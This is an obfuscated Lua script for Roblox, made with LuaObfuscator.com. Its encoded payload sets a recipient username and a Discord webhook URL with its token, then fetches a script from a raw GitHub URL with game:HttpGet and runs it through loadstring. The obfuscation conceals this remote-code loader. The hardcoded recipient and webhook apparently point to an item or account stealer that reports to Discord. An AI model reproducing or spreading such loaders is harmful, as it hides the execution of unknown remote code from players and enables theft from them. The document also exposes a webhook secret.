--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (0==v83) then v84=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-1)) + (620 -((1432 -(282 + 595)) + 64)))) ;return v84-(v84%(932 -((2494 -(1523 + 114)) + 74))) ;end end else local v85=0;local v86;while true do if (v85==(568 -(367 + 201))) then v86=((835 + 94) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and 1) or ((0 -0) + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + ((1048 + 21) -(68 + 997)) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * (285370 -219834)) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(0 -0)) then v39=0;v40=nil;v38=1;end if ((8 -5)==v38) then v45=nil;while true do local v91=0;local v92;while true do if (v91~=(1636 -(1373 + 263))) then else v92=0;while true do if (v92~=(1000 -(451 + 549))) then else local v111=0;while true do if ((0 + 0)~=v111) then else if (v39~=2) then else local v157=0;while true do if (v157~=(1 -0)) then else return v43;end if ((0 -0)==v157) then for v160=1385 -(746 + 638) ,v24() do local v161=0 + 0 ;local v162;local v163;local v164;while true do if ((0 -0)~=v161) then else local v169=0;while true do if (v169~=(341 -(218 + 123))) then else v162=1581 -(1535 + 46) ;v163=nil;v169=1 + 0 ;end if (v169~=(1 + 0)) then else v161=561 -(306 + 254) ;break;end end end if (v161==1) then v164=nil;while true do if (v162==1) then while true do if (v163==0) then v164=v22();if (v21(v164,1,1)~=(0 + 0)) then else local v180=0 -0 ;local v181;local v182;local v183;local v184;local v185;local v186;while true do if (v180==0) then v181=0;v182=nil;v180=1;end if (v180==3) then while true do if (v181==(1469 -(899 + 568))) then v186=nil;while true do if (v182~=(1 + 0)) then else local v196=0;while true do if (v196~=(0 -0)) then else v185=nil;v186=nil;v196=1;end if ((604 -(268 + 335))==v196) then v182=2;break;end end end if (0~=v182) then else v183=290 -(60 + 230) ;v184=nil;v182=573 -(426 + 146) ;end if (v182==(1 + 1)) then while true do if (v183~=2) then else local v197=1456 -(282 + 1174) ;local v198;while true do if (v197==(811 -(569 + 242))) then v198=0;while true do if (v198~=(0 -0)) then else local v207=0;while true do if (v207==(0 + 0)) then if (v21(v185,1,1025 -(706 + 318) )~=(1252 -(721 + 530))) then else v186[2]=v45[v186[1273 -(945 + 326) ]];end if (v21(v185,4 -2 ,2 + 0 )~=1) then else v186[703 -(271 + 429) ]=v45[v186[3]];end v207=1;end if (v207==1) then v198=1;break;end end end if (v198~=1) then else v183=3 + 0 ;break;end end break;end end end if (v183==0) then local v199=0;local v200;while true do if (v199==0) then v200=0;while true do if (v200==(1501 -(1408 + 92))) then v183=1087 -(461 + 625) ;break;end if (v200~=0) then else local v208=0;local v209;while true do if ((1288 -(993 + 295))==v208) then v209=0;while true do if (v209==0) then local v219=0 + 0 ;while true do if (v219~=(1171 -(418 + 753))) then else v184=v21(v164,2,3);v185=v21(v164,4,6);v219=1 + 0 ;end if (v219~=(1 + 0)) then else v209=1;break;end end end if (v209~=(1 + 0)) then else v200=1 + 0 ;break;end end break;end end end end break;end end end if (v183~=3) then else if (v21(v185,532 -(406 + 123) ,3)~=(1770 -(1749 + 20))) then else v186[4]=v45[v186[4]];end v40[v160]=v186;break;end if (v183==(1 + 0)) then local v202=0;while true do if ((1322 -(1249 + 73))==v202) then local v206=0 + 0 ;while true do if (v206==0) then local v210=1145 -(466 + 679) ;while true do if (v210~=1) then else v206=2 -1 ;break;end if (v210==0) then v186={v23(),v23(),nil,nil};if (v184==(0 + 0)) then local v215=0;local v216;local v217;local v218;while true do if (v215==(1 + 0)) then v218=nil;while true do if (v216==(2 -1)) then while true do if (0==v217) then v218=0 -0 ;while true do if (v218==(114 -(4 + 110))) then v186[587 -(57 + 527) ]=v23();v186[1431 -(41 + 1386) ]=v23();break;end end break;end end break;end if (v216~=(103 -(17 + 86))) then else local v222=0 + 0 ;while true do if (v222==(1 -0)) then v216=1;break;end if (v222~=0) then else v217=0;v218=nil;v222=1;end end end end break;end if (v215~=(0 -0)) then else v216=166 -(122 + 44) ;v217=nil;v215=1 -0 ;end end elseif (v184==1) then v186[9 -6 ]=v24();elseif (v184==(2 + 0)) then v186[1 + 2 ]=v24() -(2^16) ;elseif (v184==(5 -2)) then local v223=65 -(30 + 35) ;local v224;local v225;while true do if (v223~=1) then else while true do if (v224==0) then v225=0 + 0 ;while true do if (v225==0) then v186[1260 -(1043 + 214) ]=v24() -(2^(60 -44)) ;v186[4]=v23();break;end end break;end end break;end if (0~=v223) then else v224=0;v225=nil;v223=1213 -(323 + 889) ;end end end v210=1;end end end if (v206==(2 -1)) then v202=1;break;end end end if (1~=v202) then else v183=2;break;end end end end break;end end break;end if (v181==(580 -(361 + 219))) then local v191=0;while true do if (v191==1) then v181=1;break;end if (0==v191) then v182=320 -(53 + 267) ;v183=nil;v191=1;end end end if (v181==1) then local v192=0 + 0 ;while true do if (v192~=0) then else v184=nil;v185=nil;v192=1;end if ((414 -(15 + 398))~=v192) then else v181=984 -(18 + 964) ;break;end end end end break;end if (v180==(3 -2)) then v183=nil;v184=nil;v180=2 + 0 ;end if (v180~=(2 + 0)) then else v185=nil;v186=nil;v180=3;end end end break;end end break;end if (v162==(850 -(20 + 830))) then local v171=0 + 0 ;local v172;while true do if (0~=v171) then else v172=0;while true do if (v172==1) then v162=1;break;end if (v172~=0) then else local v187=0;while true do if (v187~=(127 -(116 + 10))) then else v172=1 + 0 ;break;end if (v187==(738 -(542 + 196))) then v163=0;v164=nil;v187=1;end end end end break;end end end end break;end end end for v165=1,v24() do v41[v165-1 ]=v29();end v157=1;end end end if (v39~=(1 -0)) then else local v158=0;local v159;while true do if (v158==0) then v159=0;while true do if (v159==1) then local v167=0;while true do if (v167==(0 + 0)) then for v173=1 + 0 ,v44 do local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if (v174~=2) then else v179=nil;while true do if ((0 + 0)==v175) then local v188=0 -0 ;while true do if (v188==1) then v175=2 -1 ;break;end if ((1551 -(1126 + 425))~=v188) then else v176=405 -(118 + 287) ;v177=nil;v188=3 -2 ;end end end if (v175==1) then local v189=0;while true do if (v189==(1121 -(118 + 1003))) then v178=nil;v179=nil;v189=2 -1 ;end if (v189~=1) then else v175=2;break;end end end if (v175==(379 -(142 + 235))) then while true do if (v176==1) then v179=nil;while true do if (v177~=0) then else local v193=0 -0 ;local v194;while true do if (v193==0) then v194=0;while true do if (v194==1) then v177=1 + 0 ;break;end if (v194~=0) then else local v203=977 -(553 + 424) ;while true do if (v203~=(1 -0)) then else v194=1;break;end if (v203==0) then v178=v22();v179=nil;v203=1 + 0 ;end end end end break;end end end if (v177==1) then if (v178==1) then v179=v22()~=(0 + 0) ;elseif (v178==(2 + 0)) then v179=v25();elseif (v178==(2 + 1)) then v179=v26();end v45[v173]=v179;break;end end break;end if (v176==0) then local v190=0 + 0 ;while true do if (v190~=1) then else v176=2 -1 ;break;end if (v190==0) then v177=0 -0 ;v178=nil;v190=2 -1 ;end end end end break;end end break;end if (v174==(1 + 0)) then v177=nil;v178=nil;v174=9 -7 ;end if (v174~=(753 -(239 + 514))) then else v175=0;v176=nil;v174=1 + 0 ;end end end v43[1332 -(797 + 532) ]=v22();v167=1 + 0 ;end if (v167==1) then v159=1 + 1 ;break;end end end if (v159==2) then v39=4 -2 ;break;end if (v159~=0) then else local v168=0;while true do if (v168~=1) then else v159=1;break;end if (v168==(1202 -(373 + 829))) then v44=v24();v45={};v168=1;end end end end break;end end end v111=1;end if (v111~=(732 -(476 + 255))) then else v92=1131 -(369 + 761) ;break;end end end if (v92~=(1 + 0)) then else if (v39~=(0 -0)) then else local v150=0 -0 ;while true do if (v150==0) then v40={};v41={};v150=1;end if (v150~=2) then else v39=1;break;end if (v150~=1) then else v42={};v43={v40,v41,nil,v42};v150=240 -(64 + 174) ;end end end break;end end break;end end end break;end if (v38==(1 + 0)) then v41=nil;v42=nil;v38=2 -0 ;end if (v38~=2) then else v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=336 -(144 + (1193 -(938 + 63))) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((218 -(42 + 134 + 40))==v46) then v51=v21(v48,21,24 + 7 );v52=((v21(v48,(1152 -(936 + 189)) + 5 )==1) and  -1) or (1 + 0) ;v46=3;end if (v46==(1507 -(363 + 376 + 765))) then if (v51==0) then if (v50==(1580 -(1183 + 397))) then return v52 * (0 -0) ;else v51=1 + 0 ;v49=0 + 0 ;end elseif (v51==(4022 -(1913 + 62))) then return ((v50==(0 + 0)) and (v52 * ((2 -1)/(1933 -(565 + 1368))))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/(((1620 -(1565 + 48)) -5)^((1059 + 654) -(1477 + 184))))) ;end if (v46==(0 -0)) then v47=v24();v48=v24();v46=1 + 0 ;end if (v46==(857 -(564 + (1430 -(782 + 356))))) then v49=268 -(176 + 91) ;v50=(v21(v48,1 -0 ,60 -40 ) * (((797 -491) -(244 + 60))^(25 + 7))) + v47 ;v46=478 -(41 + 435) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1093 -(975 + 117)) );v19=v19 + v53 ;local v55={};for v67=1, #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=1875 -(157 + (3960 -2242)) ;local v58;local v59;while true do if (v57==(1 + 0)) then return (v59 * (908 -652)) + v58 ;end if ((0 -0)==v57) then v58,v59=v1(v16,v19,v19 + ((398 + 622) -((1305 -608) + 321)) );v19=v19 + (5 -3) ;v57=1 -0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v87=v2(v0(v60,16));if v20 then local v93=0;local v94;while true do if (v93==0) then v94=v5(v87,v20);v20=nil;v93=1;end if (v93==1) then return v94;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=4) then if (v82<=1) then if (v82>0) then local v99=v81[2];local v100=v79[v81[3]];v79[v99 + 1 ]=v100;v79[v99]=v100[v81[4]];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=2) then local v106=0;local v107;local v108;while true do if (v106==5) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v106=6;end if (v106==6) then v73=v73 + 1 ;v81=v69[v73];v108=v81[2];v107=v79[v81[3]];v106=7;end if (v106==3) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v106=4;end if (0==v106) then v107=nil;v108=nil;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v106=1;end if (v106==1) then v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v106=2;end if (v106==7) then v79[v108 + 1 ]=v107;v79[v108]=v107[v81[4]];v73=v73 + 1 ;v81=v69[v73];v106=8;end if (v106==2) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v106=3;end if (v106==4) then v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v106=5;end if (v106==8) then v79[v81[2]]=v81[3];break;end end elseif (v82==3) then local v112=0;local v113;while true do if (0==v112) then v113=v81[2];v79[v113]=v79[v113](v13(v79,v113 + 1 ,v74));break;end end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=6) then if (v82>5) then v79[v81[2]]();else do return;end end elseif (v82<=7) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>8) then v79[v81[2]]=v81[3];else local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==0) then v118=v81[2];v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v117=1;end if (v117==1) then v74=(v120 + v118) -1 ;v121=0;v117=2;end if (v117==2) then for v154=v118,v74 do v121=v121 + 1 ;v79[v154]=v119[v121];end break;end end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503073O006472794E4F564F03093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31303534373438303537333132343732392F4D6D6575717A354A557735536971574B394E5372782D4544467933787441756D386D442D7364482O55706274376636474650426F36616835626D6764797A627462426334030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585363726970745A5053582F6D61696E2F5073584C797068657258000F3O0012023O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A4O0004000400014O0008000100044O00035O00022O00063O000100012O00053O00017O00",v9(),...);end
